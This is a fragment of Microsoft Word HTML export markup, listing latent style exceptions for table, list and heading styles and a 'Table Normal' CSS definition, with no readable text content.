<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number 5"/>
<w:LsdException Locked="false" Priority="10" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Closing"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Signature"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="true"
UnhideWhenUsed="true" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Continue 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Message Header"/>
<w:LsdException Locked="false" Priority="11" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Salutation"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Date"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text First Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Note Heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Body Text Indent 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Block Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Hyperlink"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="FollowedHyperlink"/>
<w:LsdException Locked="false" Priority="22" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Document Map"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Plain Text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="E-mail Signature"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Top of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Bottom of Form"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal (Web)"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Acronym"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
</style>
<![endif]-->
</span></div>
<br />
<h3>
<span lang="EN-US" style="mso-ansi-language: EN-US;"><div class="MsoNormal" style="text-align: left;">
